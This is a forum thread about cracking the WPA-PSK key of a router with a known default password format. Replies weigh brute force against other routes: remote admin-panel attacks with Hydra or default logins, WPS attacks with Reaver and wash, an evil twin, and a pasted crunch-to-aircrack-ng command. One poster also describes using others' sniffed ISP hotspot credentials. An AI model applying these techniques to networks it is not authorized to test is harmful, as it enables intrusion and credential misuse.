Jump to content

Cracking WPA-PSK with known password structure


sil3nce

Recommended Posts

So I know that the router generates random passwords in this structure:

xxxx-xxxx-xxxx

It uses all loweralphnumeric and includes the dashes, but no other special characters. I've been reading about generating rainbow tables, but all the options include too much, or wont allow me to generate 12 character long passwords. But I don't know if I totally understand the process yet, I'm still reading.

Does anyone know a good way of generating either plaintext dictionary or rainbow tables that fit this specific format only? I want to create a dictionary that includes all possible combinations for this format. Correct me if I'm wrong, but there should be:

62^12 = 3,226,266,762,397,899,821,056 possible combinations?

This if for my personal TP-Link router that I bought. Noticed this default password formatting and want to see if I can generate a customized table for it.

Really appreciate any advice or input. :happy:

Link to comment
Share on other sites

TL;DR - Don't bother with brute-forcing. Here's why:

Your 62^12 is an absolute worst-case scenario, but we can improve upon it.

Each combination will have at least 1 of each type of character. That makes it 24*24*10*(62^9) which reduces your keyspace to a mere 77,973,618,506,478,059,520 or roughly 1/40th of the worst-case original

Let's take it one step further and say that a valid key will have not 1 but 2 of each type of character at a minimum. That also implies that no type of character will appear more than 8 times which seems fair. With that you get 24*24*10*24*24*10*(62^6) or 1,884,495,496,111,718,400. This is 0.06% of your original keyspace. A significant reduction I would say.

Going by that last number, let's assume for a minute that, using rainbow tables and what not, you can check a single key combination in 1 nanosecond. To get the amount of time needed to check full keyspace you divide the number by 86400000000 to get the amount of days. That comes to roughly 21811290 days or 59756 years! You would need to get 1000 machines capable of computing a key within 1 nanosecond (which I hope I don't have to explain would be a feat in and of itself) just to break that one key within your own lifetime.

Link to comment
Share on other sites

Guest spazi

I once tried to use crunch to compute a wordlist with all possible WiFi password.

came around 1.5 Petabytes.
Simply, it's not worth it.
It's easier to hack the admin panel of the router remotely and try to extract the wifi password from there.

Link to comment
Share on other sites

And it'll be cheaper and faster to pay someone to break into the building in question and replace the router with your own that you have the password for.

Link to comment
Share on other sites

I was afraid that would be the answer. It would be really cheap to replace it with a route I know the password to, cause it's my router :P :P P However, these routers are as common as flies, so were I wanted to get into someone else's that would be a very clever and 007 kind of solution.

I once tried to use crunch to compute a wordlist with all possible WiFi password.

came around 1.5 Petabytes.
Simply, it's not worth it.
It's easier to hack the admin panel of the router remotely and try to extract the wifi password from there.

I'm very interested in this. I've never thought about hacking the admin panel when I wasn't already connected. How would I go about doing that? If I'm not connected then I can't just enter the gateway via http. I don't necessarily need a tutorial, but maybe a few bread crumbs to follow :P

Thanks guys!!!!

Link to comment
Share on other sites

Because routers are (by necessity) internet facing devices, the external IP address is (usually) pingable.

Most of the time, the router will accept HTTP requests over port 80 from any connection. This means that if you know the IP address of the router (usually static for a business or anything corporate and dynamic for a home connection, but there are always exceptions), you can browse to the routers management page. From there something like Hydra might be able to help you crack the login or maybe the default login still works, which happens a lot of the time.

Link to comment
Share on other sites

And I assumed that since the router has one internet-facing side and one lan-facing side, the management service would be active only on the lan-facing side...

What I'm interested in is the routers they have here where there's a small amount of bandwith alotted for other customers of the same ISP that would allow them to use that small amount to do their internetting via YOUR router. It's all perfectly legit, but now there's effectively two lan-facing sides and what I wonder is if the second lan-facing side is in fact unable to connect to the management service...

Link to comment
Share on other sites

You'd think that'd be the case, wouldn't you? It seems common sense..

Well, here in the UK, BT run such a service. The idea is you sign up to "BT openzone" and it broadcasts a second open SSID from your router. If someone tries to connect to it, they are sent to a captive portal where you have to login with your BT account to get any internet access. It's pretty decently setup actually, you can't even DNS tunnel out of it.

The whole second subnet is firewalled in such a way that you can't get anywhere near the management service, at least in the way that BT have it setup. Be interesting to here about how other providers go about it.

Link to comment
Share on other sites

Over here the second SSID is either "Ziggo" or "UPS" (the names of the 2 major dutch cable internet providers, combined they cover approx. 90% of the total country) and the basic setup is that to login, you provide some unique credentials via WPA-EAP which gets authenticated via a Radius server at the ISP's side. It's already been demonstrated that the authentication process chosen makes it easy to sniff your credentials during connect, but they said they weren't particularly concerned about it and if need be they could adjust things but for the time being they won't. And that's over 18 months ago.

So I'm with Ziggo, my sister is with UPS and my whole family has wifi internet access in roughly 90% of the Netherlands in a fairly legit manner (at least to the point where they can't prove you're abusing it since you are in fact using valid credentials - just maybe not yours but good luck proving the opposite while you're sitting on a bench in a park somewhere near a residential area).

Link to comment
Share on other sites

And I assumed that since the router has one internet-facing side and one lan-facing side, the management service would be active only on the lan-facing side...

What I'm interested in is the routers they have here where there's a small amount of bandwith alotted for other customers of the same ISP that would allow them to use that small amount to do their internetting via YOUR router. It's all perfectly legit, but now there's effectively two lan-facing sides and what I wonder is if the second lan-facing side is in fact unable to connect to the management service...

So if I understand this correctly, you can connect to your own router remotely and use the bandwidth through there? Like a VPN? Don't you need a net connection to get to your router? I'm from the US, living in China, and I'm not familiar with that. Unless I'm just not quite sure what you're talking about. :P

I'll try accessing the router via the external IP when I have a chance, but if I can not access the management and I can't brute force my way in by capturing IVS then what other options are there? I mean it's a super cheap junkie router. It can't be unhackable. It seems too easy for the management menu to be accessible from the outside, when the remote management is off by default.

Link to comment
Share on other sites

I do believe you're misunderstanding.

Think of the router as a box with 1 cloud on one side and 2 clouds on the other. The router is connected to the single cloud. That cloud is the internet, so this is the internet-facing side of your router.

The router is also connected to the other 2 clouds, one is your wired lan and the other is your wireless lan. Both of them constitute the lan-facing side(s) of your router.

Depending on your router you can have 1 or more wireless lans (multiple SSIDs being broadcast, as is the case with the Ziggo/UPC SSIDs which are separate from my regular SSID) so if I were to draw this for the router I posess, it would have the internet cloud on one side, and on the other there are 3 clouds - wired, wireless and ISP public wireless. Of the total bandwidth available to me, a limited amount is potentially available to the ISP public wireless cloud, but all that remains is available to the other 2 clouds. In my particular case, unless the general public manages to grow wings (I'm on the 5th floor of an appartement building) I get effectively all available bandwidth all to myself AND I can still use that limited amount on other people's router when I'm out and about.

The point I was making in the section that you quoted is that the router itself runs a management webservice. This webservice should most certainly never be made available to the internet cloud - there's no reason in hell for the internet at large to tweak the settings of your router. The other side is different. The webservice will in pretty much all instances be available to the wired lan. Depending on your router it may or may not allow access to the webservice on the private wireless side of it. And it most certainly should not provide access to the webservice from the ISP public wireless cloud since, like with the internet cloud, all people that need to come in through there have no ownership rights to my router.

The question I'm asking aloud is if they did in fact restrict access to the webservice from the ISP public wireless sufficiently.

I say "sufficiently" because I'm sure they did in some way or otherwise it would've been found already, given that they've already shown that the username and password can be easily acquired from people with their current authentication scheme. I'm sure such low-hanging fruit would've been on their scope aswell.

Link to comment
Share on other sites

OH I understand now! So essentially all routers from the ISP broadcast to the public and create a public wifi network that anyone can access? Right? If so, that's fantastic! There is nothing worse than needing wifi and having no open networks anywhere nearby.

You're right. The remote management needs never to be active. Unless I suppose I need to fix my grandmother's wireless from China :P.

Were I you I would be very interested in the holes made available by this extra "cloud". But I'm still not sold that a crappy 15RMB router is unhackable. But I'm wondering if the only access is through a social hole. Either a trojan or physical access. My goal is to access this router without either. Especially since social engineering is rather silly when I'm attacking myself...

Link to comment
Share on other sites

That's pretty much it except for the fact that this public wifi network is only accessible by other customers of the same ISP, but given their abundance it's hardly a limitation.

The problem you're facing isn't so much that the 15RMB router, being the pathetic lump of craptastic plastic with a few cheap chips on it that it is, is of sufficiently quality to withstand attack (any hammer can prove otherwise) but rather that the fundamental technology implemented by the device (and required to be implemented to work on the network to begin with) has thus far proven to be sound. Unless additional advances are made the inherent protections provided by the technology suffice. You could take a look at the chips they use to implement the technology, see if you can find flaws in the implementation of the networking stack. After all, to get a protocol going there needs to be an exchange of information, so try to fiddle with the bits in your packets and see if the router responds in a perculiar way to them.

In other words, don't attack the standard WPA-PSK algorithms but instead go for the blocks it has been built upon.

Link to comment
Share on other sites

You say that there's no reason in hell why the management interface should be open to the internet, but a quick search on Shodan shows otherwise! :/ I never understood why all ISPs don't automatically turn it off. The problem is that easily 80-90% of users don't even know that the management page exists!

All of the routers I've ever owned (BTHomeHub up to version 3, then Asus RT-N66U currently) have ALL had the management interface open on port 80 to the wide web. BT's routers are crap, so I wasn't really surprised, but Asus are (a bit) more respected!

The worst bit was that BT didn't even let you turn it off! You had to forward port 80 to another device on the network to fix it!

Link to comment
Share on other sites

You could take a look at the chips they use to implement the technology, see if you can find flaws in the implementation of the networking stack. After all, to get a protocol going there needs to be an exchange of information, so try to fiddle with the bits in your packets and see if the router responds in a perculiar way to them.

In other words, don't attack the standard WPA-PSK algorithms but instead go for the blocks it has been built upon.

I'm sure you're right, but I'm still too noobie to know exactly what I would do to probe. If I can't crack the WPA algorithm it seems like the router wouldn't communicate. I imagine there is something I'm missing. I won't ask for a tutorial :P but maybe a tip on where to direct my research. Looking at the chip set for vulnerabilities. But how do I probe? Wireshark would just watch, right? Nmap, ping, netcat, etc can't communicate unless I'm connected, right? Or is the approach from the public side?

Link to comment
Share on other sites

Most people are only interested in the router because it's the gateway to the actual goal - either the LAN or the internet, typically the latter (which, I might add, is rather boring). To get there the router has to allow you pass-through rights. You get these by informing the router who you are. This implies communication. What I'm suggesting is that you take a good hard look at this communication.

Figure out what the full protocol spec says about the packets that get sent here. What do they contain? What happens when you vary it a bit. What happens when you send the packets in the wrong order? What happens when you send garbage? Are there fields in the packet that signify the length of something? What happens when you play around with those lengths? Think Heartbleed bug here.

Wireshark is a decent tool to look into this as it will show you bit-level packet data including headers and what not. But remember that to really dive into this you need to have a solid grasp on the spec (as in you need to know that byte 13 bit 4 is either 0 or 1 depending on BLA) so look that up first and start reading so you know what you can expect. Have Wireshark capture a succesful exchange to see that it all works as expected. You may have to tell wireshark in some way what the wifi password is so it can decode the traffic as I suspect a fair chunk of it will be.

NMAP can identify the type of host on the network by playing tricks with the bits in the various packets. Can you spot similar differences on wireless chipsets aswell? I don't know if it's been investigated yet, but if it has I haven't heard about it.

Link to comment
Share on other sites

  • 1 month later...

I have a suggestion....

While I was researching how to break a WPA key I have found a few ways....

The first way is you can try to brute force it but as we all know that wont work unless you have a few hundred years to blow

The second way would be with Craig Heffner's Reaver which is very useful if your router has WPS enabled and it is built right into BackTrack 5

and also you can use WASH in BT5 to check if any access points around you have WPS enabled this was also created by Craig Heffner

I believe the command is wash -i (put your interface here ex. mon0) -C

The third way is using a Evil Twin Attack on the router https://www.youtube.com/watch?v=LwEjYL6Eoro I personally like Cris Haralson's tutorial on youtube

The last way is a way to bruteforce the pass key but is a lot simpler and a ... little bit ... more practical then the normal way

http://security.stackexchange.com/questions/35278/bruteforce-on-10-characters-length-wpa2-password

The part of the post that I found to be very interesting is here...

I'm currently developing similar technologies. Aircrack-ng really is brilliant although it does have some limitations.

I have also attempted a brute force on my own wifi using crunch to generate passwords. and my findings are as such:

  • You can pipe crunch directly into Aircrack-ng to eliminate the need to create a .txt file and use it simultaneously saving you processing power to perform calculations, the Syntax for this method in bash is as such:

here you can see the standard format for piping into aircrack-ng and some simple options.

./crunch <max> <min>(stick to 8 for now)<options>(abcd1234..) can give partial passwo@@@| aircrack-ng -b [bssid] -w - [.cap file]

Here is a working copy you can paste into terminal (below), I'll talk you through it a little.

From left to right:

  1. The name of the command crunch, if this doesn't work straight away force execution by starting with ./crunch.
  2. 8 8 is the max and min chars you're going to need as I'm sure you already know.
  3. Then a pipe symbol. This feeds the output directly into the file that aircrack-ng is going to use as a dictionary
  4. Fill in Bssid's as you already know how to do in this format once your handshake has been established.

WORKING COPY:

crunch 8 8 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ -t 97KQA@@@ | aircrack-ng -b 78:54:2E:28:E7:86 -w - thehak-01.cap

THE PROBLEM WITH THIS METHOD:

Using a permutation equation and using an expected 1000 combinations per second (this is what my actual output is) I have calculated that testing each of the generated combinations will take 77.8 years

I hope this helped you!

...Sorry if any of these methods were already mentioned I didn't get a chance to read all of them

Edited by I_NEED_HELP
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...